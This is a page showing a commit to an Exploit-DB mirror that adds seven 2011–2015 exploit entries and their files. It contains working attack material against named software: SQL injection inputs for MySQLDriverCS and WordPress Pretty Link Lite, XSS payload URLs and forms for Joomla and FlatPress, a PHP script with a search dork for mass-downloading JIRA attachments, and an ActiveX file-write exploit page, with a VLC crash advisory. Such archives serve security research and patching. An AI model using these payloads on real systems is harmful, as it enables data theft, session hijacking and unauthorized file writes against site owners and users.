bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-27

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2015-01-27 08:36:44 +00:00
parent 4b322b34f0
commit db799531d8
8 changed files with 202 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
files.csv
View file

@ -32327,3 +32327,10 @@ id,file,description,date,author,platform,type,port
35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0
35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0
35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0
35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0

Can't render this file because it is too large.

35
platforms/multiple/remote/35892.txt Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/48466/info
MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.
There is an example for illustrating the attack against the vulnerability:
----------------------------------------------------------------------
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Connection.Open();
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
Cmd.Fill(dt);
Cmd.SelectCommand.Connection.Close();
----------------------------------------------------------------------
Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
----------------------------------------------------------------------
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"
----------------------------------------------------------------------
Then, the final sql query statement executed by Mysql is as following:
----------------------------------------------------------------------
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
----------------------------------------------------------------------
Of course, we should use two parameters to launch a cross-parameter SQL injection attack.

72
platforms/multiple/remote/35898.php Executable file
View file

@ -0,0 +1,72 @@
source: http://www.securityfocus.com/bid/48484/info
Atlassian JIRA is prone to a security bypass vulnerability.
An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application.
<?php
/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google otherwise
you will get a lot of 404*/
echo "\n#########################################################
###################
# \n#Attachment downloader by Ignacio Garrido\n#";
if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/
1 12310371#
############################################################################\n";die;}
else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n";
#\n############################################################################\n";}
$url2 = $argv[1];
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}
if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}
$numero = $argv[2];
for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");
if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);
echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);
}
}
echo "\n#All attachment downloaded correctly!\n";
die;
?>

14
platforms/php/webapps/35893.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/48469/info
The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pretty Link Lite 1.4.56 is vulnerable; prior versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
select @@version
http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
select @@version
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
select @@version

12
platforms/php/webapps/35894.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/48471/info
Joomla! CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Joomla! CMS versions 1.6.3 and prior are vulnerable.
http://www.example.com/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";><script>alert(/XSS/)</script>
http://www.example.com/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
http://www.example.com/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
http://www.example.com/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request

14
platforms/php/webapps/35896.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/48482/info
FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FlatPress 0.1010.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?x=entry:entry110603-123922;comments:1" method="post">
<input type="hidden" name="name" value=&#039;"><script>alert(1);</script>&#039;>
<input type="hidden" name="email" value=&#039;"><script>alert(2);</script>&#039;>
<input type="hidden" name="url" value=&#039;"><script>alert(3);</script>&#039;>
<input name="send" value="EXPLOIT" type="submit">
</form>

29
platforms/windows/local/35902.txt Executable file
View file

@ -0,0 +1,29 @@
Title : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9598
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST: ?https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: http://www.exploit-db.com/spolits/35902-poc.m2v
## EDB Mirror: http://www.exploit-db.com/spolits/35902-windbglog.txt

19
platforms/windows/remote/35897.html Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/48483/info
CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub
</script>
</html>